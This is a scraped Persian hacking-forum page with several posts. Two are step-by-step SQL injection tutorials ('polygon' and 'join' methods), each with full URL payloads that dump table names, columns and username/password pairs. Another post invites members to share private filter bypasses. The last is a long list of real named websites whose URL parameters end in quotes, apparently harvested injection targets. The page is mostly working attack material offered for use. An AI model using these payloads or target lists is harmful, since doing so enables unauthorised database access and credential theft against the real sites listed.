۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  22. با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : http://site.com/news.php/id=polygon((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
  23. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  24. بسم الله الرحمن الرحیم با اجازه ی دوستان می خوام تحولی در بایپس ها ایجاد کنم! ( البته با کمک دوستان) می خوام کاملترین آموزش بایپس ها SQL رو از مبتدی تا پیشرفته توی انجمن قرار بدم. انشاالله با کمک دوستان می خواهم جامع ترین تاپیک بایپس های اس کیو ال رو بزنیم. دوستان هم اگه بایپس خاصی رو بلدند حتی اگر priv8 هستش رو توی خصوصی به من بگویند تا توی آموزش ها ازش استفاده بشود. سعی میشه توی آموزشات تمامی بایپس ها توضح داده بشه و بایپسی از زیر دستمون در نره. J همچنین برای هر دستور یک پارت در نظر گرفته شده. (تا بتوانیم به طور جامع به هر دستور بپردازیم.) قوانین رو هم بلدید ، من دیگه متذکر نمیشم. با تشکر.
  25. F0RG3T_P03

    SQL Injection(PART1)

    http://www.kapitol.co.uk/index.php?id=15' http://www.durlston.co.uk/index.php?id=3'&dry_id=2'&nid=119' http://www.boldcreative.co.uk/index.php?id=1'&l=en'&news_id=48'&page[news]=1' http://www.paulheatonmusic.co.uk/?id=2' http://www.greenwichauctions.co.uk/index.php?id=2' http://www.catsatappleyard.co.uk/index.php?id=2' http://www.rainbowtours.co.uk/area/oman/sur-wahiba-sands/ http://www.rainbowtours.co.uk/types/romantic-holidays/ http://www.falkirklocalhistorysociety.co.uk/home/index.php?id=68' http://www.otleyhall.co.uk/index_2592.htm http://www.filllpg.co.uk/index.php?page=lpg.php'&focusstation=1078' http://www.emporialife.co.uk/index.php?id=emporia_life_mobile_phone_for_the_elderly' http://ryby.empatia.pl/index.php?id=285' http://www.mts.pl/index.php?mod=targi'&pod=szczegoly'&id=2513' http://www.minneapolisparks.org/default.asp?PageID=4'&parkid=270' http://www.movemontana.com/(S(gvex0d55btjosq45ustswy55))/default.aspx?id=MOR073'&systemID=5'&pageid=46' http://nsulaw.nova.edu/faculty/profiles.cfm?pageid=340' http://www.eaglesinthecity.com/default.aspx?PageID=1032' http://www.globalknowledge.com/training/course.asp?pageid=9'&courseid=10196'&catid=200'&country=United+States' http://www.cmhc-schl.gc.ca/en/inpr/afhoce/prpr/loader.cfm?csModule=security/getfile'&pageid=213248' http://www.learnprolognow.org/lpnpage.php?pagetype=html'&pageid=lpn-htmlse12' http://www.globalknowledge.ca/training/course.asp?pageid=64'&courseid=13257'&catid=276'&country=Canada' http://www.cabriolety.pl/?pageid=4'&lang=pl' http://www.movemontana.com/(S(0doohhrk12cwsn55p4oou155))/default.aspx?id=MOR073'&systemID=5'&pageid=74' http://www.leavenworth.org/modules/pages/?pageid=290'&path=289|290' http://www.varleygroup.com/templates/varley_content.aspx?pageID=3548' http://www.helpline-online.com/HelplineSearch.aspx?pageid=providerlist'&txtRegion=All of Mass'&txtKeyword=online counseling'&txtService='&outofstate=False'&pl=helpline' http://www.prokarate.eu/page.asp?pageID=49'&subID=49'&lang=en' http://www.theetoncollection.co.uk/content.aspx?pageid=450' http://www.ewrc.cz/ewrc/show.php?id=16217'&title=legends-of-speed-in-dresden-germany' http://www.stribro.cz/show.php?id=84' http://www.ticketsonline.cz/topperformers.php?id=concerts'&nType=prague'&loc=21' http://www.clovekvtisni.cz/index2en.php?id=517' http://www.schnauzer.cz/clanek.php?id=124' http://www.jedensvetnaskolach.cz/index2en.php?id=286' http://www.schnauzer.cz/fotogalerie_kategorie.php?id=36' http://www.enki.cz/download.php?id=55' http://www.am800cklw.com/page.php?id=9' http://www.inec.de/show.php?id=186'&currsite=tanker'&pagetitle=Tanker' http://www.theaterverzeichnis.de/show.php?id=1774'&show_ref=yes'&bundesland_id=4' http://www.deutsche-museen.de/show.php?myname=index'&id=8100'&show_ref=yes'&bundesland_id=2' http://sabda.sriaurobindoashram.org/catalog/show.php?id=about' http://www.benchmarxjoinery.co.uk/?pageId=16'&hierarchy=Kitchens' http://www.benchmarxshowroom.co.uk/?pageId=48' http://www.junckers.co.uk/?pageid=H3059' http://www.cityheatingspares.co.uk/?pageId=11' http://www.teknos.co.uk/?pageid=H2901' http://www.conferenceaston.co.uk/content.aspx?PageID=1799' http://www.coulin.co.uk/?pageid=9' http://www.yourbirthright.co.uk/index.asp?PageID=22' http://www.egmont.co.uk/default.asp?pageid=31' http://www.nationaltrail.co.uk/article.asp?PageId=3'&ArticleId=623' http://www.chinesescooterclub.co.uk/default.asp?pageid=14' http://www.octc.co.uk/content.asp?PageID=63' http://www.pegasus.co.uk/content.asp?PageId=1636' http://www.theetoncollection.co.uk/content.aspx?pageID=656' http://www.belgiancafe.co.uk/page.asp?PageID=1' http://www.clearwellmobility.co.uk/product_listing.aspx?PageID=11' http://www.amemptosmusic.co.uk/ourstandard.asp?pageid=88' http://www.wood.teknos.co.uk/?pageid=H14690' http://www.casus-belli.co.uk/index.asp?pageid=116' http://www.foa.co.uk/index.aspx?pageid={69197089-8e15-482a-8763-1b35bdf5a645}' http://www.partiesrus.co.uk/500.aspx?aspxerrorpath=/ShowProducts.aspx http://www.nationaltrail.co.uk/hadrianswall/gallery_image.asp?PageId=134'&ImageId=141' http://www.essentialedinburgh.co.uk/ee-subpage.aspx?pageID=172' http://www.regionuppsala.se/?pageID=515' http://www.minneapolisparks.org/default.asp?PageID=4'&parkid=273' http://www.monarkexercise.se/?pageid=496' http://www.impactcoatings.se/page_STD.aspx?PageId=19'&LangId=en'&MenuId=3' http://www.smogenbryggan.se/click.php?x=3660' http://biosite.se/ViewPage.aspx?PageID=33' http://www.monarkexercise.se/default.asp?PageID=674' http://www.trollspeed.se/textPage.aspx?PageID=3' http://www.globalknowledge.com/training/locationdetail.asp?pageid=3'&hotelid=Q6UJ9A04KUCI'&country=United+States' http://snitts.se/default-en.asp?categoryID=5'&parentID=1'&pageID=79' http://www.thetarget.se/index.php?pageid=19' http://www.tpsport.se/page.aspx?pageId=22' http://www.landskrona.se/Pages/Page.aspx?pageId=5620' http://www.papernet.se/iuware.aspx?pageid=139298'&ssoid=157367' http://www.designarkivet.se/en/index.php?pageid=112' http://www.habit.se/iuware.aspx?pageid=5694' http://www.veteranlastbilar.se/showimg.asp?pageid=739'&item=72' http://www.hurriyetdailynews.com/video.aspx?pageID=428' http://www.ivprodukt.se/pages/Page.aspx?pageId=992' http://www.kandre.se/default.asp?PageID=711' http://www.igsab.se/?pageID=1097' http://www.igsab.se/index.asp?pageID=671' http://www.scanarc.se/pages.asp?PageID=4105' http://www.aahperd.org/naspe/about/announcements/loader.cfm?csModule=security/getfile'&pageid=180939' http://www.yukyuks.com/location.aspx?LocationID=3'&PageID=1' http://www.homelifepro.com/index.php?pageid=3'&agentcode=JACOBJA'&typeid=ICI' http://cbdesk.pl/show.php?id=448' http://www.cbdesk.pl/show.php?id=6' http://www.pacificedgeclimbinggym.com/staff_detail.php?staff_id=2' http://www.communityinclusion.org/staff.php?staff_id=40' http://www.cbmin.org/cbm/staff?staff_id=10' http://www.penntap.psu.edu/default-staff.asp?staff_id=49' http://www.brubacher.net/staff_bio.asp?staff_id=12' http://www.advantagecontrols.com/staff.php?staff_id=30' http://www.sffootball.net/nfl_combine.asp?Staff_ID=4' http://www.thatcherud.k12.az.us/exec/eStaffTeachersweb.asp?set_site_to=THS'&division=Site:+Teachers'&group_is='&staff_id=319' http://www.stockdaleleggo.com.au/staff-profile.asp?STAFF_ID=2797'&OFFICE_ID=85' http://www.roworl.ne.jp/salon/staff.php?staff_id=1'&salon_id=8' http://www.sc.psu.ac.th/eng/Dept/DisplayTeacher.asp?DEPT_ID=047'&STAFF_ID=0002794' http://www.haasnaja.com/recent_transactions.asp?staff_id=9' http://mvpa.jp/staff_detail.php?staff_id=449' http://www.galenterprise.co.jp/staff.php?staff_id=5' http://www.reocc.co.jp/case/list_staff?staff_id=93' http://www.kusuri.co.uk/view_product.php?id=245' http://www.beemabuild.co.uk/view_product.php?id=258' http://www.coastal-koi.com/view_product.php?id=1393' http://www.lpcreative.co.za/view_product.php?p=7'&id=171' http://black-hg.org/cc/showthread.php?t=758'&page=9' http://www.accutronics.co.uk/pages/view_product.php?id=15' http://www.donaticus-him.ru/view_product.php?id=4' http://www.hydromasta.com.au/view_product.php?p=20803'&id=21' http://www.sandtropez.com/view_product.php?product_id=1350' http://www.academiaga.ru/index.php?id=53'&lang=0' http://www.mi.ras.ru/index.php?c=show_dep'&id=6'&l=1' http://www.bibliophika.ru/index.php?id='&tip_id=0'&col_id='&col_tp='&dosearch='&np=1' http://actr.nsk.ru/index.php?lang=rus'&module=eic/links.acie' http://www.ecwatech.ru/index.php?lang=en' http://www.wollemipine.ro/gallery.php?lang=ro'&id=103'&printer_friendly=true' http://www.keepmovieng.com/en/index.php?id=2'&lang=pagini'&cat=scurt_metraj' http://www.romanianwriters.ro/book.php?id=76' http://www.onlymelbourne.com.au/melbourne.php?id=105' http://www.pcgg.de/people_detail.php?id=14' http://www.klimt02.net/jewellers/index.php?item_id=11203' http://www.otstrasbourg.fr/article.php?id_article=203'&lang=fr http://www.hamodia.fr/article.php?id=1347' http://www.cluster-maritime.fr/article.php?lang=Uk'&id=29' http://www.technoscope.fr/article.php?IDArticle=2166' http://www.djembefola.fr/articles/article.php?id=145' http://www.reims-ms.fr/info/fr/article.php?numid=543' http://www.servirlepublic.fr/article.php?ID=1032' http://www.thetalentboutique.fr/article.php?id=117' http://www.americanethnography.com/article.php?id=6 http://www.solutionfocusedtrainers.co.uk....php?id='4 http://www.arcdi.com/trainers.php?id='30 http://www.fscus.org/certified_companies...p?id='2120 http://kcet.org/programs/event-detail.php?ID='2854 http://www.sidsillinois.org/news-detail.php?id='134 http://www.sitkacenter.org/classes/detail.php?id='129 http://www.sbdcwv.org/spm-detail.php?id='25 http://dev.surfacedesign.org/catalog-detail.php?ID='67 http://csba.foresightdesign.org/events/d...hp?id='892 http://www.largeblackhogs.org/detail.php?id='6 http://www.sebabluegrass.org/members/detail.php?id='286 http://talkingbroadway.org/eopinions/detail.php?id='95 http://www.sidsillinois.org/fundraisers-...hp?id='137 http://www.presentmusic.org/concerts.detail.php?id='50 http://www.visionspring.org/newscenter/n...hp?id='820 http://nursingphd.org/programs/detail.php?id='12 http://www.soros.org/grants/research/detail.php?id='175 http://www.teachertraininghub.org/detail.php?id='197 http://www.maclaurin.org/professors.detail.php?id='11 http://www.monarchwatch.org/waystations/...p?id='1015 http://www.thecomputerschool.org/WeeklyU...hp?id='296 http://www.wopl.org/tips-detail.php?id='26 http://www.globalwaterchallenge.org/news...hp?id='933 http://www.globalwaterchallenge.org/news...hp?id='940 http://www.islamresearchdirectory.org/de...hp?id='234 http://pifmer.org/about/pifmernews-detail.php?id='26 http://qdsb.chinacourt.org/public/detail.php?id='114 http://dyzy.chinacourt.org/public/detail.php?id='20330 http://www.heller-elektro.de/detail.php?...Radiatoren http://www.schwoerer.de/en/aktuelles/neu...hp?id='360 http://www.schwoerer.de/en/aktuelles-detail.php?id='318 http://www.idruhr.de/detail.php?id='25958 http://www.daf-portal.de/ticker/detail.php?id='2397 http://www.modelkult.de/model-detail.php?id='150 http://www.expo2000.de/detail.php?id='1086293844 http://www.panormaimage.co.cc/detail.php?id='4 http://www.callmedia.co.uk/news/detail.php?id='000037 http://www.hyosung.co.uk/detail.php?id='1 http://www.rothervalleyoptics.co.uk/detail.php?id='2059 http://www.leafestateagents.co.uk/detail.php?id='43 http://www.pgoscooters.co.uk/detail.php?id='40 http://www.decorativeliving.co.uk/detail.php?ID='856/ http://www.nationalmotorcyclemuseum.co.u...php?id='34 http://www.ksbr.co.uk/blog/blog/detail.php?id='3 http://www.dogsukclan.co.uk/stats/cod4/p...1372951950 http://www.pfb-clan.co.uk/ultrastats/pla...id='862510 http://london-letting.co.uk/prop-detail.php?id='1871 http://www.ticlan.co.uk/cod4stats/player...LAYERID} http://www.ag47.co.uk/detail.php?id='115 http://www.strawberry-clothing.co.uk/det...?id='00303 http://www.synergyconnections.co.uk/news...id='000049 http://www.stratford-rowing.co.uk/news/d...php?id='21 http://www.englishcountrygardeners.co.uk...id='000023 http://www.overmantels.co.uk/detail.php?ID=' http://www.englishcountrygardeners.co.uk...id='000055 http://www.leadgeneratorsmail.co.uk/seed...hp?ID='358 http://www.deckingstyle.co.uk/detail.php?id='6 http://www.gsxrtrophy.co.uk/news/detail.php?id='000070 http://upandrunning.co.uk/websales/detai...id='999195 http://www.helyerdesign.co.uk/projects/d...EXTENSIONS http://www.djhfs.co.uk/news-detail.php?ID='9 http://www.naturalgardenfurniture.co.uk/...tamp='1648 http://www.blundell.co.uk/detail.php?id='irplrpc550 http://www.windmillvillagehotel.co.uk/ne...php?id='27 http://www.lazystudent.co.uk/detail.php?id='86 http://www.greenpower.co.uk/shop/detail....Foffset%3D https://web248.secure-secure.co.uk/myash...'Y&sid='25 http://www.suzuki-gb.co.uk/accessories/d...id='001012 http://www.cherryprofessional.co.uk/detail.php?id='87 http://www.leasingworld.co.uk/freepages/...php?ID='42 http://sexyet.co.uk/detail.php?ID='100 http://www.greathampers.co.uk/detail.php?id='116 http://www.xljoinery.co.uk/detail.php?id='5083&tc='1 http://www.northderbyscommercials.co.uk/...hp?id='378 http://www.birdwatchnorthumbria.co.uk/re....php?id='1 http://www.suzuki-marine.co.uk/news/deta...id='000710 http://www.experienceenterprise.co.uk/di...php?id='12 http://www.upandrunning.co.uk/websales/d...id='727647 http://www.ferreyandmennim.co.uk/detail.php?id='31 http://www.prayertimes.info/detail.php?id='30466 http://www.climate-and-freshwater.info/l...php?id='17 http://www.climate-and-freshwater.info/l...php?id='10 http://www.blog-search.info/detail.php?id='5735 http://www.bouwportaal.info/pages/partne...hp?id='345 http://www.elektroherde.info/detail.php?...onvektoren http://www.greenpage.info/indexu/detail.php?id='1409 http://bankett.info/ek/en/detail.php?id='186 http://www.salton.info/detail.php?id='99 http://www.stadtumbau-ost.info/praxis/detail.php?id='36 http://www.odissee.info/detail.php?ID='9...='repondre http://www.elektroherde.info/de/detail.p...ektroherde http://www.urady-prace.info/detail.php?i...0000139701 http://prace.nachodsko.info/detail.php?i...0000072361 http://www.solalbert.info/news/detail.php?id='40 http://www.stadtumbau-ost.info/literatur...DF-Dateien http://www.4rentky.us/detail.php?id='267 http://www.4saleky.us/detail.php?id='181 http://www.ci.rancho-mirage.ca.us/reside...hp?id='105 http://www.4rentoh.us/detail.php?id='104 http://www.wopl.lib.nj.us/tips-detail.php?id='26 http://www.piedmont.k12.ca.us/phs/news/d...php?id='94 http://www.nationstrust.us/mortgageInfor...php?id='31 http://nemec.us/umelci/detail.php?id='54&ido='562 http://www.worldfashion.us/promo/detail.php?ID='7295 http://tc.j-goods.us/detail.php?ID='22 http://jp.j-goods.us/detail.php?ID='33 http://www.smcorp.us/detail.php?id='162 http://www.customraceengines.us/detail.php?id='28 http://herdb.todaylove.us/detail.php?id='118 http://jennifermarohasy.com/publications.php?id='15 http://www.rezol.com/publications.php?id='1 http://www.benjaminarai.com/benjamin_ara...hp&id='151 http://www.lebeauhumblet.com/publications.php?id='2 http://www.fredhamilton.com/publications.php?id='80 http://www.emergentarchitecture.com/publ....php?id='1 http://www.louiswassermanandassociates.c...php?id='24 http://wintercools.com/publications.php?id='63 http://www.atelierswan.com/publications.php?id='7 http://www.mcc-mobilites.com/les-publica...6fadda90f9 http://cesam-formation.com/publications.php?id='63 http://www.aikido-europe.com/fr/publicat...'&lang='fr http://www.docuinter.net/en/publications.php?id='34 http://www.docuinter.net/cz/publications.php?id='34 http://www.sterlingfinance.net/publications.php?id='2 http://www.ecole-lacanienne.net/publicat...hp?id='319 http://www.stephenhagan.net/publications.php?id='14 http://www.cpaug.org/publications.php?Id='24 http://www.volunteeringengland.org/manag...hp?id='283 http://www.spatialinformationdesignlab.o...php?id='69 http://www.paltrade.org/en/publications.php?id='145 http://www.paltrade.org/cms/publications.php?id='75 http://chirurgiesthetique.org/publicatio...5&start='0 http://www.hcsolicitors.co.uk/publications.php?ID='35 http://www.cam-research-group.co.uk/deta....php?id='6 http://www.chinashopunion.com/productinfo.php?id='109 http://mould-foundry.com/productinfo.php...assid='315 http://www.thegoodfolk.com/productinfo.php?id='38 http://www.alesofdevon.com/productinfo.php?id='1 http://www.triggerpointmassageball.com/p...php?id='13 http://www.fatuarte.com/productinfo.php?id='1173 http://www.specialoils.com/productinfo.php?id='52 http://thegenealogist.sandn.net/nameinde...php?id='74 http://www.sjztm.net/productinfo.php?id='115 http://www.omnilogyinc.org/events/produc...php?id='86 https://ssl.hostingplatform.com/www.natu...php?id='75 http://www.thefutureisfierce.com/releases.php?ID='22 http://blizzle.com/releases.php?id='1751 http://www.finalwebsites.com/releases.php?id='25 http://www.invadarecords.com/Releases.php?ID='INVCD018 http://www.vodafone-2u.co.uk/productinfo.php?id='9536 http://www.discogalaxy.com/pages/releases.php?id='100 http://www.inrecs.com/releases.php?id='37 http://www.skippinggirlvinegar.com/releases.php?id='4 http://spokesrecords.com/releases.php?id='12 http://www.njwrecords.com/releases.php?id='14 http://www.alancampbellgroup.com/press-r...php?id='21 https://ssl.hostingplatform.com/dev.natu...php?id='33 http://www.auditionrocks.com/demo/releas...ance_id='4 http://www.dancedp.com/sections/releases.php?id='3 http://www.nwgrapevine.com/news/press-re...php?id='39 http://www.odiosutela.com/releases.php?id='6 http://www.rockbrasileiro.com/site/novo/...hp?id='555 http://www.kraak.net/en/releases.php?ID='33 http://www.suryabrasil.com/releases.php?id='4 http://widestream.sourceforge.net/releases.php?id='17 http://www.post-digital.net/releases/rel...php?id='42 http://www.neospire.net/corporate/media....php?id='81 http://www.soiconsortium.org/news-events....php?id='2 http://www.newmexicohistory.org/about_us...php?id='12 http://www.thefutureisfierce.co.uk/releases.php?ID='7 http://www.neospire.co.uk/corporate/medi...php?id='87 http://www.betjemanandbarton.com/en/shop/ray.php?id='14 http://geroyche.c8.com/releases.php?id='14 http://www.jet-travel.com/produit.php?id='90 http://www.la-pedale.com/pages/produit.php?id='728 http://www.lextronic.notebleue.com/produit.php?id='2912 http://www.charot.com/produit.php?id='68 http://www.bullster.com/fr/catalogue-pro...rche='moto http://www.bullster.com/en/catalogue-pro...rche='moto http://www.guitar-legend.com/pages/produit.php?id='863 http://www.ovadesign.com/site/produit.php?id='47 http://www.zygwen.com/fiche-produit.php?...e='Proline